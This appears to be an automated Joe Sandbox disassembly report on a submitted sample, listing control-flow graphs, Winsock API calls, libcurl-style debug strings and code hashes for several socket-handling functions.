                                          control_flow_graph 1612 259290-2592ed call 2276a0 1615 2593c3-2593ce 1612->1615 1616 2592f3-2592fb 1612->1616 1625 2593e5-259427 call 23d090 call 264f40 1615->1625 1626 2593d0-2593e1 1615->1626 1617 259301-259333 call 23d8c0 call 23d9a0 1616->1617 1618 2593aa-2593af 1616->1618 1637 259335-259364 WSAIoctl 1617->1637 1638 2593a7 1617->1638 1619 2593b5-2593bc 1618->1619 1620 259456-259470 1618->1620 1623 2593be 1619->1623 1624 259429-259431 1619->1624 1623->1620 1628 259433-259437 1624->1628 1629 259439-25943f 1624->1629 1625->1620 1625->1624 1626->1619 1630 2593e3 1626->1630 1628->1620 1628->1629 1629->1620 1633 259441-259453 call 2650a0 1629->1633 1630->1620 1633->1620 1641 259366-25936f 1637->1641 1642 25939b-2593a4 1637->1642 1638->1618 1641->1642 1644 259371-259390 setsockopt 1641->1644 1642->1638 1644->1642 1645 259392-259395 1644->1645 1645->1642
                                          APIs
                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0025935D
                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00259388
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: Ioctlsetsockopt
                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                          • API String ID: 1903391676-2691795271
                                          • Opcode ID: 3035b32a951f35adf1d34ade783ef0895eeedd2c0af40ca2ebea1673a1c1c3b1
                                          • Instruction ID: 98e5a3ea34bcbd315205f35408f995fb271e5ee7abbcfaa88ef2fccc41e810be
                                          • Opcode Fuzzy Hash: 3035b32a951f35adf1d34ade783ef0895eeedd2c0af40ca2ebea1673a1c1c3b1
                                          • Instruction Fuzzy Hash: 1851E070604306EBD710DF24C881FAAB7A5FF88314F148569FD488B292E730EDA6CB95

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1646 2275e0-2275ed 1647 227607-227629 socket 1646->1647 1648 2275ef-2275f6 1646->1648 1650 22762b-22763c call 2272a0 1647->1650 1651 22763f-227642 1647->1651 1648->1647 1649 2275f8-2275ff 1648->1649 1652 227643-227699 call 2272a0 call 22cb20 call 5a8c50 1649->1652 1653 227601-227602 1649->1653 1650->1651 1653->1647
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                          • API String ID: 98920635-842387772
                                          • Opcode ID: f4b0780e44ca37cbb3d7d45e619b7747d524228199f1c4ed2ea93dbf30c82273
                                          • Instruction ID: 7870c527520c31d30801ab9a4ab83bfeb5045e1c06722460caad8cc888537a59
                                          • Opcode Fuzzy Hash: f4b0780e44ca37cbb3d7d45e619b7747d524228199f1c4ed2ea93dbf30c82273
                                          • Instruction Fuzzy Hash: A2114CB1A28A3237D6209FA8BC5AE6B3B9CEFC6724F040510F804662D2E215CD7487E1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1755 25a150-25a159 1756 25a250 1755->1756 1757 25a15f-25a17b 1755->1757 1758 25a181-25a1ce getsockname 1757->1758 1759 25a249-25a24f 1757->1759 1760 25a1f7-25a214 call 25ef30 1758->1760 1761 25a1d0-25a1f5 call 23d090 1758->1761 1759->1756 1760->1759 1766 25a216-25a23b call 23d090 1760->1766 1768 25a240-25a246 call 264f40 1761->1768 1766->1768 1768->1759
                                          APIs
                                          • getsockname.WS2_32(?,?,00000080), ref: 0025A1C7
                                          Strings
                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0025A23B
                                          • getsockname() failed with errno %d: %s, xrefs: 0025A1F0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                          • API String ID: 3358416759-2605427207
                                          • Opcode ID: b2db62314817f84410b843896d3ec80ed9770c6ee7b0bd5e1de6337a35f8f706
                                          • Instruction ID: b321102df03565c8dffdb805cf5fee65470e68afde82b18cefa7f109f5125141
                                          • Opcode Fuzzy Hash: b2db62314817f84410b843896d3ec80ed9770c6ee7b0bd5e1de6337a35f8f706
                                          • Instruction Fuzzy Hash: 7021F871918680AAE6259B18EC47FE773BCEF91324F040614FD9853051FB32599A8AE3

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1775 23d5e0-23d5ee 1776 23d652-23d662 WSAStartup 1775->1776 1777 23d5f0-23d604 call 23d690 1775->1777 1779 23d670-23d676 1776->1779 1780 23d664-23d66f 1776->1780 1783 23d606-23d614 1777->1783 1784 23d61b-23d651 call 247620 1777->1784 1779->1777 1782 23d67c-23d68d 1779->1782 1783->1784 1789 23d616 1783->1789 1789->1784
                                          APIs
                                          • WSAStartup.WS2_32(00000202), ref: 0023D65B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: if_nametoindex$iphlpapi.dll
                                          • API String ID: 724789610-3097795196
                                          • Opcode ID: cd19ea7ffb2eb10763fca1ea673e5628633cf23c47a583167ecc31c810a1ec7f
                                          • Instruction ID: a5057fa9829fe2a66ca79bb2cafbaf4ce38308819e6581106b19f44955dcf2b6
                                          • Opcode Fuzzy Hash: cd19ea7ffb2eb10763fca1ea673e5628633cf23c47a583167ecc31c810a1ec7f
                                          • Instruction Fuzzy Hash: 4B012BD0D54B8246E711BF3CBD1B33625E8AB51304F4419689868951D2FB7DC5B9C292

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1791 2eaa30-2eaa64 1793 2eaa6a-2eaaa7 call 2de730 1791->1793 1794 2eab04-2eab09 1791->1794 1798 2eab0e-2eab13 1793->1798 1799 2eaaa9-2eaabd 1793->1799 1795 2eae80-2eae89 1794->1795 1800 2eae2e 1798->1800 1801 2eaabf-2eaac7 1799->1801 1802 2eab18-2eab50 1799->1802 1803 2eae30-2eae4a call 2dea60 call 2debf0 1800->1803 1801->1800 1804 2eaacd-2eab02 1801->1804 1807 2eab58-2eab6d 1802->1807 1816 2eae4c-2eae57 1803->1816 1817 2eae75-2eae7d 1803->1817 1804->1807 1810 2eab6f-2eab73 1807->1810 1811 2eab96-2eabab socket 1807->1811 1810->1811 1813 2eab75-2eab8f 1810->1813 1811->1800 1815 2eabb1-2eabc5 1811->1815 1813->1815 1829 2eab91 1813->1829 1818 2eabc7-2eabca 1815->1818 1819 2eabd0-2eabed ioctlsocket 1815->1819 1821 2eae6e-2eae74 1816->1821 1822 2eae59-2eae5e 1816->1822 1817->1795 1818->1819 1823 2ead2e-2ead39 1818->1823 1824 2eabef-2eac0a 1819->1824 1825 2eac10-2eac14 1819->1825 1821->1817 1822->1821 1832 2eae60-2eae6c 1822->1832 1830 2ead3b-2ead4c 1823->1830 1831 2ead52-2ead56 1823->1831 1824->1825 1838 2eae29 1824->1838 1826 2eac16-2eac31 1825->1826 1827 2eac37-2eac41 1825->1827 1826->1827 1826->1838 1835 2eac7a-2eac7e 1827->1835 1836 2eac43-2eac46 1827->1836 1829->1800 1830->1831 1830->1838 1837 2ead5c-2ead6b 1831->1837 1831->1838 1832->1817 1842 2eace7-2ead03 1835->1842 1843 2eac80-2eac9b 1835->1843 1840 2eac4c-2eac51 1836->1840 1841 2ead04-2ead08 1836->1841 1845 2ead70-2ead78 1837->1845 1838->1800 1840->1841 1850 2eac57-2eac78 1840->1850 1841->1823 1849 2ead0a-2ead28 1841->1849 1842->1841 1843->1842 1851 2eac9d-2eacc1 1843->1851 1847 2ead7a-2ead7f 1845->1847 1848 2eada0-2eadae connect 1845->1848 1847->1848 1852 2ead81-2ead99 1847->1852 1854 2eadb3-2eadcf 1848->1854 1849->1823 1849->1838 1855 2eacc6-2eacd7 1850->1855 1851->1855 1852->1854 1862 2eae8a-2eae91 1854->1862 1863 2eadd5-2eadd8 1854->1863 1855->1838 1861 2eacdd-2eace5 1855->1861 1861->1841 1861->1842 1862->1803 1864 2eadda-2eaddf 1863->1864 1865 2eade1-2eadf1 1863->1865 1864->1845 1864->1865 1866 2eae0d-2eae12 1865->1866 1867 2eadf3-2eae07 1865->1867 1868 2eae1a-2eae1c call 2eaf70 1866->1868 1869 2eae14-2eae17 1866->1869 1867->1866 1873 2eaea8-2eaead 1867->1873 1872 2eae21-2eae23 1868->1872 1869->1868 1874 2eae25-2eae27 1872->1874 1875 2eae93-2eae9d 1872->1875 1873->1803 1874->1803 1876 2eaeaf-2eaeb1 call 2de760 1875->1876 1877 2eae9f-2eaea6 call 2de7c0 1875->1877 1881 2eaeb6-2eaebe 1876->1881 1877->1881 1882 2eaf1a-2eaf1f 1881->1882 1883 2eaec0-2eaedb call 2de180 1881->1883 1882->1803 1883->1803 1886 2eaee1-2eaeec 1883->1886 1887 2eaeee-2eaeff 1886->1887 1888 2eaf02-2eaf06 1886->1888 1887->1888 1889 2eaf0e-2eaf15 1888->1889 1890 2eaf08-2eaf0b 1888->1890 1889->1795 1890->1889
                                          APIs
                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 002EAB9B
                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 002EABE3
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: ioctlsocketsocket
                                          • String ID:
                                          • API String ID: 416004797-0
                                          • Opcode ID: d61fb868f664f983f48ea84ea9b3153f212c8ad9507ff45d74569e8b53d48b0d
                                          • Instruction ID: 98ff8abe7e7240b80f5e92fa328b1adfdf7deb96b9ebdf43a182840875a83d6f
                                          • Opcode Fuzzy Hash: d61fb868f664f983f48ea84ea9b3153f212c8ad9507ff45d74569e8b53d48b0d
                                          • Instruction Fuzzy Hash: ADE104706603829BEB20CF25C884B6B77E5FF85304F544A2DF9988B291D775EC64CB92
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: CloseEvent
                                          • String ID: multi.c
                                          • API String ID: 2624557715-214371023
                                          • Opcode ID: 526df586f39d9e0f84a3fe5cc4cda463309fccb9cd8965c16641e1ff766145b8
                                          • Instruction ID: ce2c3bd98c10f5fa4597af7253a10f985ec6126f7c4a850659f7229fc3e7d3f5
                                          • Opcode Fuzzy Hash: 526df586f39d9e0f84a3fe5cc4cda463309fccb9cd8965c16641e1ff766145b8
                                          • Instruction Fuzzy Hash: 055108B1D243117BDB516EB0BD41B5772B8AF00318F084438EC8D9A253FB75A6398B93
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: closesocket
                                          • String ID: FD %s:%d sclose(%d)
                                          • API String ID: 2781271927-3116021458
                                          • Opcode ID: d22f4b431c10bc95a976bbe1fade579cb1821a837ef98d6ad243ab7e21e27e80
                                          • Instruction ID: c0ce0740aa2afd7acdfbd11334b2448c303110c40e4fd05c9c9f1eb03eeb9ca5
                                          • Opcode Fuzzy Hash: d22f4b431c10bc95a976bbe1fade579cb1821a837ef98d6ad243ab7e21e27e80
                                          • Instruction Fuzzy Hash: 76D05E32A192317B863069A97C48C5B6BA8DEC6F60B050D58F94067200D2349D1187F2
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: R'r
                                          • API String ID: 2962429428-4105667001
                                          • Opcode ID: 37ee5e80bb4ace013d4e80c83dd509ea9597eefa20323b406cde8bb9d86d8e19
                                          • Instruction ID: ad143730ae9f99f5a13c2d80723a3f28fd33098ba8b73c3a77f1672d9056ec18
                                          • Opcode Fuzzy Hash: 37ee5e80bb4ace013d4e80c83dd509ea9597eefa20323b406cde8bb9d86d8e19
                                          • Instruction Fuzzy Hash: 8A3182B49093159BCB40EFB8D5896AEBBF4FF44304F00896DE898A7241EB74DA54CB52
                                          APIs
                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,002EB29E,?,00000000,?,?), ref: 002EB0B9
                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,002D3C41,00000000), ref: 002EB0C1
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: ErrorLastconnect
                                          • String ID:
                                          • API String ID: 374722065-0
                                          • Opcode ID: 769184a9a85a1ff856b0b1076eef1b3169f028fa22ac7d2310e3183e6556affc
                                          • Instruction ID: 70052801c73b21cdbf96c97855f69f271aab961fadedb2b2a3105471933ad130
                                          • Opcode Fuzzy Hash: 769184a9a85a1ff856b0b1076eef1b3169f028fa22ac7d2310e3183e6556affc
                                          • Instruction Fuzzy Hash: 6801D8322542415BCA215E7AC884F6BB799FF89374F440724F97CA31E1E726FD608752
                                          APIs
                                          • gethostname.WS2_32(00000000,00000040), ref: 002D4AA5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
